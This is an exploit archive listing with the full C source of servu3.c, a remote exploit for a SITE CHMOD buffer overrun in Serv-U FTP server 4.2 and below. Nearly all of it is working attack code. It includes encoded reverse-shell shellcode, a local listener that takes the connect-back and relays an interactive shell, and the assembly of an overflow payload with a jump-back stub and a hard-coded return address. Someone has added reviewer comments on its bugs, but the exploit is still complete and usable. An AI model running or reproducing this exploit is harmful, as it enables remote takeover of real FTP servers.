
servu3.c

Posted Jan 30, 2004
Authored by mandragore, kkqq

Remote exploit that makes use of a buffer overrun in the Serv-U FTP server versions 4.2 and below.

tags | exploit, remote, overflow
SHA-256 | c4174e145fda328216ce0c52e5bf305b7a9f9a1cea90df103ee512f28f76a97d


/*
date: 25 janv 2004
software: Serv-U 4.1.0.0 (probably others)
vendor: RhinoSoft, http://www.serv-u.com/
credits: kkqq <kkqq@0x557.org>, http://www.0x557.org/release/servu.txt
greets: rosecurity team, int3liban
notes: should work on any NT, reverse bindshell, terminates the process,
handles directories properly
author: mandragore, sploiting@mandragore.solidshells.com

cheap changelog:
27 jan 2004 improved banner handling (select()-based),
added listener,
default ip gathering (needs ifconfig & gawk)

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <signal.h>
#include <fcntl.h>
#include <unistd.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>

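// Report `x` with perror() (the errno text is appended) and exit(1).
// Wrapped in do/while(0) so it behaves as a single statement and does not
// break an unbraced `if (...) fatal(...); else ...` as the bare `{ }` form did.
#define fatal(x) do { perror(x); exit(1); } while (0)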

unsigned char sc[]={
// reverse bindshell, 204 bytes, uses import table
// The array carries no trailing NUL, so its length is sizeof sc (204), not
// strlen(sc). main() overwrites the bytes at offsets 0x53 (4 bytes, listener
// host) and 0x5a (2 bytes, listener port) before use; both values are XORed
// with 0x96 bytes there.
0x33,0xC0,0x04,0xB6,0x68,0xE2,0xFA,0xC3,0xCC,0x68,0x80,0x36,0x96,0x46,0x50,0x68,
0x8B,0x34,0x24,0xB9,0xFF,0xD4,0xF2,0xF1,0x19,0x90,0x96,0x96,0x28,0x6E,0xE5,0xC9,
0x96,0xFE,0xA5,0xA4,0x96,0x96,0xFE,0xE1,0xE5,0xA4,0xC9,0xC2,0x69,0x83,0xE2,0xE2,
0xC9,0x96,0x01,0x0F,0xC4,0xC4,0xC4,0xC4,0xD4,0xC4,0xD4,0xC4,0x7E,0x9D,0x96,0x96,
0x96,0xC1,0xC5,0xD7,0xC5,0xF9,0xF5,0xFD,0xF3,0xE2,0xD7,0x96,0xC1,0x69,0x80,0x69,
0x46,0x05,0xFE,0xE9,0x96,0x96,0x97,0xFE,0x94,0x96,0x96,0xC6,0x1D,0x52,0xFC,0x86,
0xC6,0xC5,0x7E,0x9E,0x96,0x96,0x96,0xF5,0xF9,0xF8,0xF8,0xF3,0xF5,0xE2,0x96,0xC1,
0x69,0x80,0x69,0x46,0xFC,0x86,0xCF,0x1D,0x6A,0xC1,0x95,0x6F,0xC1,0x65,0x3D,0x1D,
0xAA,0xB2,0xC6,0xC6,0xC6,0xFC,0x97,0xC6,0xC6,0x7E,0x92,0x96,0x96,0x96,0xF5,0xFB,
0xF2,0x96,0xC6,0x7E,0x99,0x96,0x96,0x96,0xD5,0xE4,0xF3,0xF7,0xE2,0xF3,0xC6,0xE4,
0xF9,0xF5,0xF3,0xE5,0xE5,0xD7,0x96,0x50,0x91,0xD2,0x51,0xD1,0xBA,0x97,0x97,0x96,
0x96,0x15,0x51,0xAE,0x05,0x3D,0x3D,0x3D,0xF2,0xF1,0x37,0xA6,0x96,0x1D,0xD6,0x9A,
0x1D,0xD6,0x8A,0x1D,0x96,0x69,0xE6,0x9E,0x69,0x80,0x69,0x46
};

// Defaults overridable from the command line (see usage()).
char *user="anonymous"; // -u: FTP login name
char *pass="not@for.you"; // -s: FTP password
char *path="/incoming"; // -w: directory sent with CWD; must be writable

// State shared between main(), reads() and callback().
int s, ret; // current socket and the last socket-call result
char *buff; // 4096-byte I/O buffer; main() and the child in callback() each malloc() their own
int verbose=0; // -v: echo the FTP exchange to stdout when non-zero
struct sockaddr_in saddr; // used for connect() in main() and for bind()/accept() in callback()
int lhost, lport=8888; // -H/-P: listener address (an in_addr_t kept in an int, default from getip()) and port

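// Print the option summary, including the current defaults, and exit(1).
// argv0 is the program name shown in the synopsis line. Never returns.
void usage(char *argv0) {
    // Copy the listener address into a real struct in_addr instead of
    // reading the int through a struct pointer, which violates strict
    // aliasing (int vs. the struct's uint32_t member).
    struct in_addr listen_addr;
    listen_addr.s_addr = lhost;

    printf("usage: %s -d <ip_dest> [options]\n",argv0);
    printf("options:\n");
    printf(" -d target ip\n");
    printf(" -p target port (default 21)\n");
    printf(" -u username to log with (default %s)\n",user);
    printf(" -s password to log with (default %s)\n",pass);
    printf(" -w writable directory (default %s)\n",path);
    printf(" -H listening host (default %s)\n", inet_ntoa(listen_addr));
    printf(" -P listening port on host (default %d)\n",lport);
    printf(" -v verbose (set to 1 to enable)\n");
    printf("\n");
    exit(1);
}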

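// Drain the server's current reply into buff: read one chunk, then keep
// reading while more data arrives within a 1-second select() window.
// On return buff is NUL-terminated and ret holds the last recv() result.
// Uses the globals s (connected socket), buff (4096 bytes) and verbose.
void reads() {
    fd_set fds;
    struct timeval tv;

    for (;;) {
        ret = recv(s, buff, 4095, 0);
        if (ret <= 0) {
            // Error or peer closed. The original unconditionally wrote
            // buff[ret], i.e. buff[-1] on -1, and on 0 looped forever because
            // a closed socket stays readable. Leave an empty reply instead so
            // the callers' strstr() checks fail and the run stops cleanly.
            buff[0] = '\0';
            return;
        }
        buff[ret] = '\0';   // ret <= 4095, so the terminator stays inside the 4096-byte buffer
        if (verbose) printf("%s", buff);

        FD_ZERO(&fds);
        FD_SET(s, &fds);
        tv.tv_sec = 1;
        tv.tv_usec = 0;
        // Continue only when select() reports the socket readable; 0 is the
        // timeout and -1 an error, neither of which should trigger another read.
        if (select(s + 1, &fds, NULL, NULL, &tv) <= 0)
            return;
    }
}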

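// Best-effort guess of the local IPv4 address for the listener: runs ifconfig
// through a fixed shell pipeline and takes the first interface that shows a
// broadcast address. Returns the address as inet_addr() yields it, or -1
// (INADDR_NONE) when the command cannot be started or prints nothing; main()
// rejects that value unless -H overrides it. The command string is a constant,
// so no caller-supplied text reaches the shell.
int getip() {
    char addr[17] = "";
    FILE *f;

    f = popen("echo -n `/sbin/ifconfig|grep Bcast|" \
              "gawk '{\\$0=gensub(/:/,\" \",1);print $3;exit;}'`", "r");
    if (f == NULL)
        return -1;   // matches what inet_addr("") would have produced

    // fgets() returns NULL when the pipeline printed nothing; addr then stays
    // "" and inet_addr() reports -1 exactly as before. A trailing newline is
    // stripped so a shell that ignores `echo -n` still yields a clean address.
    if (fgets(addr, sizeof addr, f) != NULL)
        addr[strcspn(addr, "\r\n")] = '\0';
    pclose(f);

    return inet_addr(addr);
}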

// Child-process side (forked from main()): listens on `port` for the
// connect-back, then relays between the terminal and the accepted socket
// until a read fails. Uses the file-scope globals s, ret, buff and saddr.
void callback(int port) {
fd_set fds;
int s_len=sizeof(saddr); // NOTE(review): accept() takes socklen_t*; passing an int* assumes equal width — confirm
int sn;

buff=(char *)malloc(4096); // result not checked; this is the child's own buffer after fork()

saddr.sin_family = AF_INET;
saddr.sin_addr.s_addr = 0; // INADDR_ANY
saddr.sin_port = htons(port);
printf("[.] setting up listener on port %d..\n",port);
s=socket(2,1,6); // numeric AF_INET/SOCK_STREAM/IPPROTO_TCP (Linux values); return not checked
ret=bind(s,(struct sockaddr *)&saddr, sizeof(saddr));
if (ret==-1) {
// we don't want to crash servu if not needed: tell the parent (its SIGUSR1
// handler is killmain()) so it aborts before sending anything, then exit.
perror("[-] shell.bind");
kill(getppid(),SIGUSR1);
exit(1);
}
listen(s,1); // return not checked
sn=accept(s,(struct sockaddr *)&saddr,&s_len); // blocks until a peer connects; -1 is not checked before use
printf("[+] got connection from %s, entering shell..\n", \
inet_ntoa(*(struct in_addr *)&saddr.sin_addr.s_addr));

// Relay loop: whichever side select() reports readable is copied to the other.
while(1) {
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sn,&fds);

if (select(sn+1, &fds, NULL, NULL, NULL) < 0)
fatal("[-] shell.select ");

if (FD_ISSET(0,&fds)) {
ret = read(1,buff,4096); // NOTE(review): reads fd 1 (stdout), not fd 0 which select() watched; only equivalent when both are the same tty — confirm
send(sn,buff,ret,0); // a negative ret is passed to send() unchecked
}

if (FD_ISSET(sn,&fds)) {
if ( (ret=recv(sn,buff,4096,0)) < 1 )
fatal("[-] shell.recv"); // peer closed (0) or error (-1) ends the child
write(1,buff,ret); // partial writes are not retried
}

}

}

// SIGUSR1 handler installed in the listener child by main(): the parent has
// given up, so report that and terminate. printf()/exit() are not
// async-signal-safe; the behaviour is kept as the original wrote it.
void killchild() {
    static const char notice[] = "[-] got signal from parent, exiting.\n";
    fputs(notice, stdout);
    exit(1);
}

// SIGUSR1 handler installed in the parent by main(): the listener child
// could not set up (see callback()), so report that and terminate.
// printf()/exit() are not async-signal-safe; kept as the original wrote it.
void killmain() {
    static const char notice[] = "[-] got signal from child, exiting.\n";
    fputs(notice, stdout);
    exit(1);
}

// Parent side: parses options, forks the listener (callback()), logs in to
// the target FTP server, checks the working directory and sends one 602-byte
// SITE CHMOD request. Exits 0 if the server still answers afterwards
// (reported as "isn't vulnerable"), 1 on every other path.
int main(int argc, char **argv) {
short port=21;
int target=0; // in_addr_t kept in an int; inet_addr() returns -1 (INADDR_NONE) for bad input
int i, pid;

int delta=423; // offset in buff of the 4-byte value written below; reduced by the PWD-derived length
int callebx=0x10077A92; // libeay32.dll
char jmpback[]="\xe9\xff\xfe\xff\xff\xeb\xf9\x90\x90"; // jmp -256
char chmod[]="SITE CHMOD 777 ";

printf("[%%] Serv-u v4.1.0.0 sploit by mandragore (v2)\n");

lhost=getip(); // best-effort default; -1 or 0 is rejected after option parsing

if (argc<2)
usage(argv[0]);

// getopt() returns -1 when the options are exhausted; EOF is -1 on glibc,
// so the comparison works there — NOTE(review): confirm on other libcs.
while((i = getopt(argc, argv, "d:p:u:s:w:H:P:v:"))!= EOF) {
switch (i) {
case 'd':
target=inet_addr(optarg);
break;
case 'p':
port=atoi(optarg); // no range check; the int result is narrowed to short
break;
case 'u':
user=optarg;
break;
case 's':
pass=optarg;
break;
case 'w':
path=optarg;
break;
case 'H':
lhost=inet_addr(optarg);
break;
case 'P':
lport=atoi(optarg);
break;
case 'v':
verbose=atoi(optarg);
break;
default:
usage(argv[0]);
break;
}
}

// Reject unparsable addresses. target==0 (no -d given) is not rejected here.
if ((target==-1) || (lhost==-1) || (lhost==0))
usage(argv[0]);

printf("[.] if working you'll have a shell on %s:%d.\n", \
inet_ntoa(*(struct in_addr *)&lhost),lport);
printf("[.] launching attack on ftp://%s:%s@%s:%d%s\n", \
user,pass,inet_ntoa(*(struct in_addr *)&target),port,path);

// The child runs the listener and never returns; the parent carries on.
// NOTE(review): fork() failure (pid==-1) is not handled — the parent would
// later call kill(-1, SIGUSR1), which signals every process this user may
// signal, not just the child.
pid=fork();
switch(pid) {
case 0:
signal(SIGUSR1,killchild);
callback(lport);
break;
default:
signal(SIGUSR1,killmain);
break;
}

// Patch the listener port (2 bytes at sc+0x5a, byte-swapped) and host
// (4 bytes at sc+0x53) into the shellcode; both are XORed with 0x96 bytes.
lport=lport ^ 0x9696;
lport=(lport & 0xff) << 8 | lport >>8;
memcpy(sc+0x5a,&lport,2);

lhost=lhost ^ 0x96969696;
memcpy(sc+0x53,&lhost,4); // copies the int's own bytes: assumes sizeof(int)==4 and relies on host byte order

buff=(char *)malloc(4096); // result not checked

saddr.sin_family = AF_INET;
saddr.sin_addr.s_addr = target;
saddr.sin_port = htons(port);

s=socket(2,1,6); // numeric AF_INET/SOCK_STREAM/IPPROTO_TCP (Linux values); return not checked

ret=connect(s,(struct sockaddr *)&saddr, sizeof(saddr));
if (ret==-1) {
kill(pid,SIGUSR1); sleep(1); // stop the listener child before giving up
fatal("[-] connect()");
}
reads(); // greeting banner

// NOTE(review): the sprintf() calls below write -u/-s/-w values into the
// 4096-byte buff without a bound; over-long arguments overflow it.
sprintf(buff,"USER %s\r\n",user);
if (verbose) printf("%s",buff);
send(s,buff,strlen(buff),0);

reads();

sprintf(buff,"PASS %s\r\n",pass);
if (verbose) printf("%s",buff);
send(s,buff,strlen(buff),0);

reads();

// 230 is the FTP "logged in" reply; only the last chunk reads() left in buff is inspected.
if (strstr(buff,"230")==0) {
printf("[-] can't login\n");
exit(1);
} else
printf("[+] logged in.\n");

sprintf(buff,"CWD %s\r\n",path);
if (verbose) printf("%s",buff);
send(s,buff,strlen(buff),0);

reads();

// verify directory (the `path` argument to this sprintf() is unused by the format)
sprintf(buff,"PWD\r\n",path);
send(s,buff,strlen(buff),0);
ret=recv(s,buff,1024,0); // not checked; -1 makes the memset below write buff[-1]
memset(buff+ret,0,1);
// buff+5 presumably skips the "257 " code and the opening quote, so i is the
// length of the quoted path; a missing quote makes strstr() return NULL and
// the subtraction undefined — neither case is checked.
i=strstr(buff+5,"\x22")-buff-5;
if (i!=1) i++; // trailing /

printf("[+] sending exploit..\n");

// Assemble the 602-byte request: command prefix, 0x90 padding, then the
// pieces placed relative to delta. sc has no NUL terminator, so strlen(sc)
// depends on whatever byte follows the array in memory (sizeof sc is 204).
bzero(buff,4096);
memset(buff,0x90,600);
strcat(buff,"\r\n");
delta-=i; // strlen(path);
memcpy(buff,&chmod,strlen(chmod));
memcpy(buff+delta-9-strlen(sc),&sc,strlen(sc));
memcpy(buff+delta-9,&jmpback,5+4);
memcpy(buff+delta,&callebx,4);

send(s,buff,602,0);

// A closed connection (0) or a recv() error (-1) is taken as success.
ret=recv(s,buff,1024,0);
if ((ret==0) || (ret==-1)) {
kill(pid,SIGUSR1); sleep(1);
sleep(1);
fatal("[+] done"); // perror() appends the errno text to this message
}

printf("[-] remote servu isn't vulnerable.\n");
memset(buff+ret,0,1);
printf("%s",buff);

close(s);

exit(0);
}